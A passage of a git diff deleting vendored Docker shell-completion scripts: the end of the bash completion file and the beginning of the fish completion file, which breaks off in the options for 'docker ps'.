-_docker_secret_create() { - case "$prev" in - --label|-l) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help --label -l" -- "$cur" ) ) - ;; - esac -} - -_docker_secret_inspect() { - case "$prev" in - --format|-f) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--format -f --help" -- "$cur" ) ) - ;; - *) - __docker_complete_secrets - ;; - esac -} - -_docker_secret_list() { - _docker_secret_ls -} - -_docker_secret_ls() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help --quiet -q" -- "$cur" ) ) - ;; - esac -} - -_docker_secret_remove() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" 
-- "$cur" ) ) - ;; - *) - __docker_complete_secrets - ;; - esac -} - -_docker_secret_rm() { - _docker_secret_remove -} - - - -_docker_search() { - local key=$(__docker_map_key_of_current_option '--filter|-f') - case "$key" in - is-automated) - COMPREPLY=( $( compgen -W "false true" -- "${cur##*=}" ) ) - return - ;; - is-official) - COMPREPLY=( $( compgen -W "false true" -- "${cur##*=}" ) ) - return - ;; - esac - - case "$prev" in - --filter|-f) - COMPREPLY=( $( compgen -S = -W "is-automated is-official stars" -- "$cur" ) ) - __docker_nospace - return - ;; - --limit) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--filter --help --limit --no-trunc" -- "$cur" ) ) - ;; - esac -} - - -_docker_stack() { - local subcommands=" - deploy - ls - ps - rm - services - " - local aliases=" - down - list - remove - up - " - __docker_subcommands "$subcommands $aliases" && return - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) - ;; - esac -} - -_docker_stack_deploy() { - case "$prev" in - --bundle-file) - if __docker_is_experimental ; then - _filedir dab - return - fi - ;; - --compose-file|-c) - _filedir yml - return - ;; - esac - - case "$cur" in - -*) - local options="--compose-file -c --help --with-registry-auth" - __docker_is_experimental && options+=" --bundle-file" - COMPREPLY=( $( compgen -W "$options" -- "$cur" ) ) - ;; - esac -} - -_docker_stack_down() { - _docker_stack_rm -} - -_docker_stack_list() { - _docker_stack_ls -} - -_docker_stack_ls() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - esac -} - -_docker_stack_ps() { - local key=$(__docker_map_key_of_current_option '--filter|-f') - case "$key" in - desired-state) - COMPREPLY=( $( compgen -W "accepted running" -- "${cur##*=}" ) ) - return - ;; - id) - __docker_complete_stacks --cur "${cur##*=}" --id - return - ;; - name) - __docker_complete_stacks --cur 
"${cur##*=}" --name - return - ;; - esac - - case "$prev" in - --filter|-f) - COMPREPLY=( $( compgen -S = -W "id name desired-state" -- "$cur" ) ) - __docker_nospace - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--all -a --filter -f --help --no-resolve --no-trunc" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag '--filter|-f') - if [ $cword -eq $counter ]; then - __docker_complete_stacks - fi - ;; - esac -} - -_docker_stack_remove() { - _docker_stack_rm -} - -_docker_stack_rm() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag) - if [ $cword -eq $counter ]; then - __docker_complete_stacks - fi - ;; - esac -} - -_docker_stack_services() { - local key=$(__docker_map_key_of_current_option '--filter|-f') - case "$key" in - id) - __docker_complete_services --cur "${cur##*=}" --id - return - ;; - label) - return - ;; - name) - __docker_complete_services --cur "${cur##*=}" --name - return - ;; - esac - - case "$prev" in - --filter|-f) - COMPREPLY=( $( compgen -S = -W "id label name" -- "$cur" ) ) - __docker_nospace - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--filter -f --help --quiet -q" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag '--filter|-f') - if [ $cword -eq $counter ]; then - __docker_complete_stacks - fi - ;; - esac -} - -_docker_stack_up() { - _docker_stack_deploy -} - - -_docker_start() { - _docker_container_start -} - -_docker_stats() { - _docker_container_stats -} - -_docker_stop() { - _docker_container_stop -} - - -_docker_system() { - local subcommands=" - df - events - info - prune - " - __docker_subcommands "$subcommands $aliases" && return - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) - ;; - esac -} - -_docker_system_df() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W 
"--help --verbose -v" -- "$cur" ) ) - ;; - esac -} - -_docker_system_events() { - local key=$(__docker_map_key_of_current_option '-f|--filter') - case "$key" in - container) - __docker_complete_containers_all --cur "${cur##*=}" - return - ;; - daemon) - local name=$(__docker_q info | sed -n 's/^\(ID\|Name\): //p') - COMPREPLY=( $( compgen -W "$name" -- "${cur##*=}" ) ) - return - ;; - event) - COMPREPLY=( $( compgen -W " - attach - commit - connect - copy - create - delete - destroy - detach - die - disconnect - exec_create - exec_detach - exec_start - export - health_status - import - kill - load - mount - oom - pause - pull - push - reload - rename - resize - restart - save - start - stop - tag - top - unmount - unpause - untag - update - " -- "${cur##*=}" ) ) - return - ;; - image) - cur="${cur##*=}" - __docker_complete_images - return - ;; - network) - __docker_complete_networks --cur "${cur##*=}" - return - ;; - type) - COMPREPLY=( $( compgen -W "container daemon image network volume" -- "${cur##*=}" ) ) - return - ;; - volume) - __docker_complete_volumes --cur "${cur##*=}" - return - ;; - esac - - case "$prev" in - --filter|-f) - COMPREPLY=( $( compgen -S = -W "container daemon event image label network type volume" -- "$cur" ) ) - __docker_nospace - return - ;; - --since|--until) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--filter -f --help --since --until --format" -- "$cur" ) ) - ;; - esac -} - -_docker_system_info() { - case "$prev" in - --format|-f) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--format -f --help" -- "$cur" ) ) - ;; - esac -} - -_docker_system_prune() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--all -a --force -f --help" -- "$cur" ) ) - ;; - esac -} - - -_docker_tag() { - _docker_image_tag -} - -_docker_unpause() { - _docker_container_unpause -} - -_docker_update() { - _docker_container_update -} - -_docker_top() { - _docker_container_top -} - -_docker_version() { - 
case "$prev" in - --format|-f) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--format -f --help" -- "$cur" ) ) - ;; - esac -} - -_docker_volume_create() { - case "$prev" in - --driver|-d) - __docker_complete_plugins_bundled --type Volume - return - ;; - --label|--opt|-o) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--driver -d --help --label --opt -o" -- "$cur" ) ) - ;; - esac -} - -_docker_volume_inspect() { - case "$prev" in - --format|-f) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--format -f --help" -- "$cur" ) ) - ;; - *) - __docker_complete_volumes - ;; - esac -} - -_docker_volume_ls() { - local key=$(__docker_map_key_of_current_option '--filter|-f') - case "$key" in - dangling) - COMPREPLY=( $( compgen -W "true false" -- "${cur##*=}" ) ) - return - ;; - driver) - __docker_complete_plugins_bundled --cur "${cur##*=}" --type Volume - return - ;; - name) - __docker_complete_volumes --cur "${cur##*=}" - return - ;; - esac - - case "$prev" in - --filter|-f) - COMPREPLY=( $( compgen -S = -W "dangling driver label name" -- "$cur" ) ) - __docker_nospace - return - ;; - --format) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--filter -f --format --help --quiet -q" -- "$cur" ) ) - ;; - esac -} - -_docker_volume_prune() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) ) - ;; - esac -} - -_docker_volume_rm() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) ) - ;; - *) - __docker_complete_volumes - ;; - esac -} - -_docker_volume() { - local subcommands=" - create - inspect - ls - prune - rm - " - __docker_subcommands "$subcommands" && return - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) - ;; - esac -} - -_docker_wait() { - _docker_container_wait -} - -_docker() { - local 
previous_extglob_setting=$(shopt -p extglob) - shopt -s extglob - - local management_commands=( - container - image - network - node - plugin - secret - service - stack - system - volume - ) - - local top_level_commands=( - build - login - logout - run - search - version - ) - - local legacy_commands=( - commit - cp - create - diff - events - exec - export - history - images - import - info - inspect - kill - load - logs - pause - port - ps - pull - push - rename - restart - rm - rmi - save - start - stats - stop - swarm - tag - top - unpause - update - wait - ) - - local experimental_commands=( - checkpoint - deploy - ) - - local commands=(${management_commands[*]} ${top_level_commands[*]}) - [ -z "$DOCKER_HIDE_LEGACY_COMMANDS" ] && commands+=(${legacy_commands[*]}) - - # These options are valid as global options for all client commands - # and valid as command options for `docker daemon` - local global_boolean_options=" - --debug -D - --tls - --tlsverify - " - local global_options_with_args=" - --config - --host -H - --log-level -l - --tlscacert - --tlscert - --tlskey - " - - local host config - - COMPREPLY=() - local cur prev words cword - _get_comp_words_by_ref -n : cur prev words cword - - local command='docker' command_pos=0 subcommand_pos - local counter=1 - while [ $counter -lt $cword ]; do - case "${words[$counter]}" in - # save host so that completion can use custom daemon - --host|-H) - (( counter++ )) - host="${words[$counter]}" - ;; - # save config so that completion can use custom configuration directories - --config) - (( counter++ )) - config="${words[$counter]}" - ;; - $(__docker_to_extglob "$global_options_with_args") ) - (( counter++ )) - ;; - -*) - ;; - =) - (( counter++ )) - ;; - *) - command="${words[$counter]}" - command_pos=$counter - break - ;; - esac - (( counter++ )) - done - - local binary="${words[0]}" - if [[ $binary == ?(*/)dockerd ]] ; then - # for the dockerd binary, we reuse completion of `docker daemon`. 
- # dockerd does not have subcommands and global options. - command=daemon - command_pos=0 - fi - - local completions_func=_docker_${command} - declare -F $completions_func >/dev/null && $completions_func - - eval "$previous_extglob_setting" - return 0 -} - -eval "$__docker_previous_extglob_setting" -unset __docker_previous_extglob_setting - -complete -F _docker docker dockerd diff --git a/vendor/github.com/docker/docker/contrib/completion/fish/docker.fish b/vendor/github.com/docker/docker/contrib/completion/fish/docker.fish deleted file mode 100644 index 2715cb1aa6..0000000000 --- a/vendor/github.com/docker/docker/contrib/completion/fish/docker.fish +++ /dev/null @@ -1,405 +0,0 @@ -# docker.fish - docker completions for fish shell -# -# This file is generated by gen_docker_fish_completions.py from: -# https://github.com/barnybug/docker-fish-completion -# -# To install the completions: -# mkdir -p ~/.config/fish/completions -# cp docker.fish ~/.config/fish/completions -# -# Completion supported: -# - parameters -# - commands -# - containers -# - images -# - repositories - -function __fish_docker_no_subcommand --description 'Test if docker has yet to be given the subcommand' - for i in (commandline -opc) - if contains -- $i attach build commit cp create diff events exec export history images import info inspect kill load login logout logs pause port ps pull push rename restart rm rmi run save search start stop tag top unpause version wait stats - return 1 - end - end - return 0 -end - -function __fish_print_docker_containers --description 'Print a list of docker containers' -a select - switch $select - case running - docker ps -a --no-trunc | command awk 'NR>1' | command awk 'BEGIN {FS=" +"}; $5 ~ "^Up" {print $1 "\n" $(NF)}' | tr ',' '\n' - case stopped - docker ps -a --no-trunc | command awk 'NR>1' | command awk 'BEGIN {FS=" +"}; $5 ~ "^Exit" {print $1 "\n" $(NF)}' | tr ',' '\n' - case all - docker ps -a --no-trunc | command awk 'NR>1' | command awk 'BEGIN {FS=" 
+"}; {print $1 "\n" $(NF)}' | tr ',' '\n' - end -end - -function __fish_print_docker_images --description 'Print a list of docker images' - docker images | command awk 'NR>1' | command grep -v '' | command awk '{print $1":"$2}' -end - -function __fish_print_docker_repositories --description 'Print a list of docker repositories' - docker images | command awk 'NR>1' | command grep -v '' | command awk '{print $1}' | command sort | command uniq -end - -# common options -complete -c docker -f -n '__fish_docker_no_subcommand' -l api-cors-header -d "Set CORS headers in the Engine API. Default is cors disabled" -complete -c docker -f -n '__fish_docker_no_subcommand' -s b -l bridge -d 'Attach containers to a pre-existing network bridge' -complete -c docker -f -n '__fish_docker_no_subcommand' -l bip -d "Use this CIDR notation address for the network bridge's IP, not compatible with -b" -complete -c docker -f -n '__fish_docker_no_subcommand' -s D -l debug -d 'Enable debug mode' -complete -c docker -f -n '__fish_docker_no_subcommand' -s d -l daemon -d 'Enable daemon mode' -complete -c docker -f -n '__fish_docker_no_subcommand' -l dns -d 'Force Docker to use specific DNS servers' -complete -c docker -f -n '__fish_docker_no_subcommand' -l dns-opt -d 'Force Docker to use specific DNS options' -complete -c docker -f -n '__fish_docker_no_subcommand' -l dns-search -d 'Force Docker to use specific DNS search domains' -complete -c docker -f -n '__fish_docker_no_subcommand' -l exec-opt -d 'Set runtime execution options' -complete -c docker -f -n '__fish_docker_no_subcommand' -l fixed-cidr -d 'IPv4 subnet for fixed IPs (e.g. 
10.20.0.0/16)' -complete -c docker -f -n '__fish_docker_no_subcommand' -l fixed-cidr-v6 -d 'IPv6 subnet for fixed IPs (e.g.: 2001:a02b/48)' -complete -c docker -f -n '__fish_docker_no_subcommand' -s G -l group -d 'Group to assign the unix socket specified by -H when running in daemon mode' -complete -c docker -f -n '__fish_docker_no_subcommand' -s g -l graph -d 'Path to use as the root of the Docker runtime' -complete -c docker -f -n '__fish_docker_no_subcommand' -s H -l host -d 'The socket(s) to bind to in daemon mode or connect to in client mode, specified using one or more tcp://host:port, unix:///path/to/socket, fd://* or fd://socketfd.' -complete -c docker -f -n '__fish_docker_no_subcommand' -s h -l help -d 'Print usage' -complete -c docker -f -n '__fish_docker_no_subcommand' -l icc -d 'Allow unrestricted inter-container and Docker daemon host communication' -complete -c docker -f -n '__fish_docker_no_subcommand' -l insecure-registry -d 'Enable insecure communication with specified registries (no certificate verification for HTTPS and enable HTTP fallback) (e.g., localhost:5000 or 10.20.0.0/16)' -complete -c docker -f -n '__fish_docker_no_subcommand' -l ip -d 'Default IP address to use when binding container ports' -complete -c docker -f -n '__fish_docker_no_subcommand' -l ip-forward -d 'Enable net.ipv4.ip_forward and IPv6 forwarding if --fixed-cidr-v6 is defined. IPv6 forwarding may interfere with your existing IPv6 configuration when using Router Advertisement.' 
-complete -c docker -f -n '__fish_docker_no_subcommand' -l ip-masq -d "Enable IP masquerading for bridge's IP range" -complete -c docker -f -n '__fish_docker_no_subcommand' -l iptables -d "Enable Docker's addition of iptables rules" -complete -c docker -f -n '__fish_docker_no_subcommand' -l ipv6 -d 'Enable IPv6 networking' -complete -c docker -f -n '__fish_docker_no_subcommand' -s l -l log-level -d 'Set the logging level ("debug", "info", "warn", "error", "fatal")' -complete -c docker -f -n '__fish_docker_no_subcommand' -l label -d 'Set key=value labels to the daemon (displayed in `docker info`)' -complete -c docker -f -n '__fish_docker_no_subcommand' -l mtu -d 'Set the containers network MTU' -complete -c docker -f -n '__fish_docker_no_subcommand' -s p -l pidfile -d 'Path to use for daemon PID file' -complete -c docker -f -n '__fish_docker_no_subcommand' -l registry-mirror -d 'Specify a preferred Docker registry mirror' -complete -c docker -f -n '__fish_docker_no_subcommand' -s s -l storage-driver -d 'Force the Docker runtime to use a specific storage driver' -complete -c docker -f -n '__fish_docker_no_subcommand' -l selinux-enabled -d 'Enable selinux support. 
SELinux does not presently support the BTRFS storage driver' -complete -c docker -f -n '__fish_docker_no_subcommand' -l storage-opt -d 'Set storage driver options' -complete -c docker -f -n '__fish_docker_no_subcommand' -l tls -d 'Use TLS; implied by --tlsverify' -complete -c docker -f -n '__fish_docker_no_subcommand' -l tlscacert -d 'Trust only remotes providing a certificate signed by the CA given here' -complete -c docker -f -n '__fish_docker_no_subcommand' -l tlscert -d 'Path to TLS certificate file' -complete -c docker -f -n '__fish_docker_no_subcommand' -l tlskey -d 'Path to TLS key file' -complete -c docker -f -n '__fish_docker_no_subcommand' -l tlsverify -d 'Use TLS and verify the remote (daemon: verify client, client: verify daemon)' -complete -c docker -f -n '__fish_docker_no_subcommand' -s v -l version -d 'Print version information and quit' - -# subcommands -# attach -complete -c docker -f -n '__fish_docker_no_subcommand' -a attach -d 'Attach to a running container' -complete -c docker -A -f -n '__fish_seen_subcommand_from attach' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from attach' -l no-stdin -d 'Do not attach STDIN' -complete -c docker -A -f -n '__fish_seen_subcommand_from attach' -l sig-proxy -d 'Proxy all received signals to the process (non-TTY mode only). SIGCHLD, SIGKILL, and SIGSTOP are not proxied.' 
-complete -c docker -A -f -n '__fish_seen_subcommand_from attach' -a '(__fish_print_docker_containers running)' -d "Container" - -# build -complete -c docker -f -n '__fish_docker_no_subcommand' -a build -d 'Build an image from a Dockerfile' -complete -c docker -A -f -n '__fish_seen_subcommand_from build' -s f -l file -d "Name of the Dockerfile(Default is 'Dockerfile' at context root)" -complete -c docker -A -f -n '__fish_seen_subcommand_from build' -l force-rm -d 'Always remove intermediate containers, even after unsuccessful builds' -complete -c docker -A -f -n '__fish_seen_subcommand_from build' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from build' -l no-cache -d 'Do not use cache when building the image' -complete -c docker -A -f -n '__fish_seen_subcommand_from build' -l pull -d 'Always attempt to pull a newer version of the image' -complete -c docker -A -f -n '__fish_seen_subcommand_from build' -s q -l quiet -d 'Suppress the build output and print image ID on success' -complete -c docker -A -f -n '__fish_seen_subcommand_from build' -l rm -d 'Remove intermediate containers after a successful build' -complete -c docker -A -f -n '__fish_seen_subcommand_from build' -s t -l tag -d 'Repository name (and optionally a tag) to be applied to the resulting image in case of success' - -# commit -complete -c docker -f -n '__fish_docker_no_subcommand' -a commit -d "Create a new image from a container's changes" -complete -c docker -A -f -n '__fish_seen_subcommand_from commit' -s a -l author -d 'Author (e.g., "John Hannibal Smith ")' -complete -c docker -A -f -n '__fish_seen_subcommand_from commit' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from commit' -s m -l message -d 'Commit message' -complete -c docker -A -f -n '__fish_seen_subcommand_from commit' -s p -l pause -d 'Pause container during commit' -complete -c docker -A -f -n '__fish_seen_subcommand_from commit' -a '(__fish_print_docker_containers 
all)' -d "Container" - -# cp -complete -c docker -f -n '__fish_docker_no_subcommand' -a cp -d "Copy files/folders between a container and the local filesystem" -complete -c docker -A -f -n '__fish_seen_subcommand_from cp' -l help -d 'Print usage' - -# create -complete -c docker -f -n '__fish_docker_no_subcommand' -a create -d 'Create a new container' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s a -l attach -d 'Attach to STDIN, STDOUT or STDERR.' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l add-host -d 'Add a custom host-to-IP mapping (host:ip)' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l cpu-shares -d 'CPU shares (relative weight)' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l cap-add -d 'Add Linux capabilities' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l cap-drop -d 'Drop Linux capabilities' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l cidfile -d 'Write the container ID to the file' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l cpuset -d 'CPUs in which to allow execution (0-3, 0,1)' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l device -d 'Add a host device to the container (e.g. --device=/dev/sdc:/dev/xvdc:rwm)' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l dns -d 'Set custom DNS servers' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l dns-opt -d "Set custom DNS options (Use --dns-opt='' if you don't wish to set options)" -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l dns-search -d "Set custom DNS search domains (Use --dns-search=. 
if you don't wish to set the search domain)" -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s e -l env -d 'Set environment variables' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l entrypoint -d 'Overwrite the default ENTRYPOINT of the image' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l env-file -d 'Read in a line delimited file of environment variables' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l expose -d 'Expose a port or a range of ports (e.g. --expose=3300-3310) from the container without publishing it to your host' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l group-add -d 'Add additional groups to run as' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s h -l hostname -d 'Container host name' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s i -l interactive -d 'Keep STDIN open even if not attached' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l ipc -d 'Default is to create a private IPC namespace (POSIX SysV IPC) for the container' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l link -d 'Add link to another container in the form of :alias' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s m -l memory -d 'Memory limit (format: [], where unit = b, k, m or g)' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l mac-address -d 'Container MAC address (e.g. 
92:d0:c6:0a:29:33)' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l memory-swap -d "Total memory usage (memory + swap), set '-1' to disable swap (format: [], where unit = b, k, m or g)" -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l name -d 'Assign a name to the container' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l net -d 'Set the Network mode for the container' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s P -l publish-all -d 'Publish all exposed ports to random ports on the host interfaces' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s p -l publish -d "Publish a container's port to the host" -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l pid -d 'Default is to create a private PID namespace for the container' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l privileged -d 'Give extended privileges to this container' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l read-only -d "Mount the container's root filesystem as read only" -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l restart -d 'Restart policy to apply when a container exits (no, on-failure[:max-retry], always)' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l security-opt -d 'Security Options' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s t -l tty -d 'Allocate a pseudo-TTY' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s u -l user -d 'Username or UID' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s v -l volume -d 'Bind mount a volume (e.g., from the host: -v /host:/container, from Docker: -v /container)' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l volumes-from -d 'Mount volumes from the specified container(s)' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s w -l workdir -d 'Working 
directory inside the container' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -a '(__fish_print_docker_images)' -d "Image" - -# diff -complete -c docker -f -n '__fish_docker_no_subcommand' -a diff -d "Inspect changes on a container's filesystem" -complete -c docker -A -f -n '__fish_seen_subcommand_from diff' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from diff' -a '(__fish_print_docker_containers all)' -d "Container" - -# events -complete -c docker -f -n '__fish_docker_no_subcommand' -a events -d 'Get real time events from the server' -complete -c docker -A -f -n '__fish_seen_subcommand_from events' -s f -l filter -d "Provide filter values (i.e., 'event=stop')" -complete -c docker -A -f -n '__fish_seen_subcommand_from events' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from events' -l since -d 'Show all events created since timestamp' -complete -c docker -A -f -n '__fish_seen_subcommand_from events' -l until -d 'Stream events until this timestamp' -complete -c docker -A -f -n '__fish_seen_subcommand_from events' -l format -d 'Format the output using the given go template' - -# exec -complete -c docker -f -n '__fish_docker_no_subcommand' -a exec -d 'Run a command in a running container' -complete -c docker -A -f -n '__fish_seen_subcommand_from exec' -s d -l detach -d 'Detached mode: run command in the background' -complete -c docker -A -f -n '__fish_seen_subcommand_from exec' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from exec' -s i -l interactive -d 'Keep STDIN open even if not attached' -complete -c docker -A -f -n '__fish_seen_subcommand_from exec' -s t -l tty -d 'Allocate a pseudo-TTY' -complete -c docker -A -f -n '__fish_seen_subcommand_from exec' -a '(__fish_print_docker_containers running)' -d "Container" - -# export -complete -c docker -f -n '__fish_docker_no_subcommand' -a export -d 'Stream the contents of a container as a tar 
archive' -complete -c docker -A -f -n '__fish_seen_subcommand_from export' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from export' -a '(__fish_print_docker_containers all)' -d "Container" - -# history -complete -c docker -f -n '__fish_docker_no_subcommand' -a history -d 'Show the history of an image' -complete -c docker -A -f -n '__fish_seen_subcommand_from history' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from history' -l no-trunc -d "Don't truncate output" -complete -c docker -A -f -n '__fish_seen_subcommand_from history' -s q -l quiet -d 'Only show numeric IDs' -complete -c docker -A -f -n '__fish_seen_subcommand_from history' -a '(__fish_print_docker_images)' -d "Image" - -# images -complete -c docker -f -n '__fish_docker_no_subcommand' -a images -d 'List images' -complete -c docker -A -f -n '__fish_seen_subcommand_from images' -s a -l all -d 'Show all images (by default filter out the intermediate image layers)' -complete -c docker -A -f -n '__fish_seen_subcommand_from images' -s f -l filter -d "Provide filter values (i.e., 'dangling=true')" -complete -c docker -A -f -n '__fish_seen_subcommand_from images' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from images' -l no-trunc -d "Don't truncate output" -complete -c docker -A -f -n '__fish_seen_subcommand_from images' -s q -l quiet -d 'Only show numeric IDs' -complete -c docker -A -f -n '__fish_seen_subcommand_from images' -a '(__fish_print_docker_repositories)' -d "Repository" - -# import -complete -c docker -f -n '__fish_docker_no_subcommand' -a import -d 'Create a new filesystem image from the contents of a tarball' -complete -c docker -A -f -n '__fish_seen_subcommand_from import' -l help -d 'Print usage' - -# info -complete -c docker -f -n '__fish_docker_no_subcommand' -a info -d 'Display system-wide information' -complete -c docker -A -f -n '__fish_seen_subcommand_from info' -s f -l format -d 'Format the 
output using the given go template' -complete -c docker -A -f -n '__fish_seen_subcommand_from info' -l help -d 'Print usage' - -# inspect -complete -c docker -f -n '__fish_docker_no_subcommand' -a inspect -d 'Return low-level information on a container or image' -complete -c docker -A -f -n '__fish_seen_subcommand_from inspect' -s f -l format -d 'Format the output using the given go template.' -complete -c docker -A -f -n '__fish_seen_subcommand_from inspect' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from inspect' -s s -l size -d 'Display total file sizes if the type is container.' -complete -c docker -A -f -n '__fish_seen_subcommand_from inspect' -a '(__fish_print_docker_images)' -d "Image" -complete -c docker -A -f -n '__fish_seen_subcommand_from inspect' -a '(__fish_print_docker_containers all)' -d "Container" - -# kill -complete -c docker -f -n '__fish_docker_no_subcommand' -a kill -d 'Kill a running container' -complete -c docker -A -f -n '__fish_seen_subcommand_from kill' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from kill' -s s -l signal -d 'Signal to send to the container' -complete -c docker -A -f -n '__fish_seen_subcommand_from kill' -a '(__fish_print_docker_containers running)' -d "Container" - -# load -complete -c docker -f -n '__fish_docker_no_subcommand' -a load -d 'Load an image from a tar archive' -complete -c docker -A -f -n '__fish_seen_subcommand_from load' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from load' -s i -l input -d 'Read from a tar archive file, instead of STDIN' - -# login -complete -c docker -f -n '__fish_docker_no_subcommand' -a login -d 'Log in to a Docker registry server' -complete -c docker -A -f -n '__fish_seen_subcommand_from login' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from login' -s p -l password -d 'Password' -complete -c docker -A -f -n '__fish_seen_subcommand_from login' -s u 
-l username -d 'Username' - -# logout -complete -c docker -f -n '__fish_docker_no_subcommand' -a logout -d 'Log out from a Docker registry server' - -# logs -complete -c docker -f -n '__fish_docker_no_subcommand' -a logs -d 'Fetch the logs of a container' -complete -c docker -A -f -n '__fish_seen_subcommand_from logs' -s f -l follow -d 'Follow log output' -complete -c docker -A -f -n '__fish_seen_subcommand_from logs' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from logs' -s t -l timestamps -d 'Show timestamps' -complete -c docker -A -f -n '__fish_seen_subcommand_from logs' -l since -d 'Show logs since timestamp' -complete -c docker -A -f -n '__fish_seen_subcommand_from logs' -l tail -d 'Output the specified number of lines at the end of logs (defaults to all logs)' -complete -c docker -A -f -n '__fish_seen_subcommand_from logs' -a '(__fish_print_docker_containers running)' -d "Container" - -# port -complete -c docker -f -n '__fish_docker_no_subcommand' -a port -d 'Lookup the public-facing port that is NAT-ed to PRIVATE_PORT' -complete -c docker -A -f -n '__fish_seen_subcommand_from port' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from port' -a '(__fish_print_docker_containers running)' -d "Container" - -# pause -complete -c docker -f -n '__fish_docker_no_subcommand' -a pause -d 'Pause all processes within a container' -complete -c docker -A -f -n '__fish_seen_subcommand_from pause' -a '(__fish_print_docker_containers running)' -d "Container" - -# ps -complete -c docker -f -n '__fish_docker_no_subcommand' -a ps -d 'List containers' -complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -s a -l all -d 'Show all containers. Only running containers are shown by default.' -complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -l before -d 'Show only container created before Id or Name, include non-running ones.' 
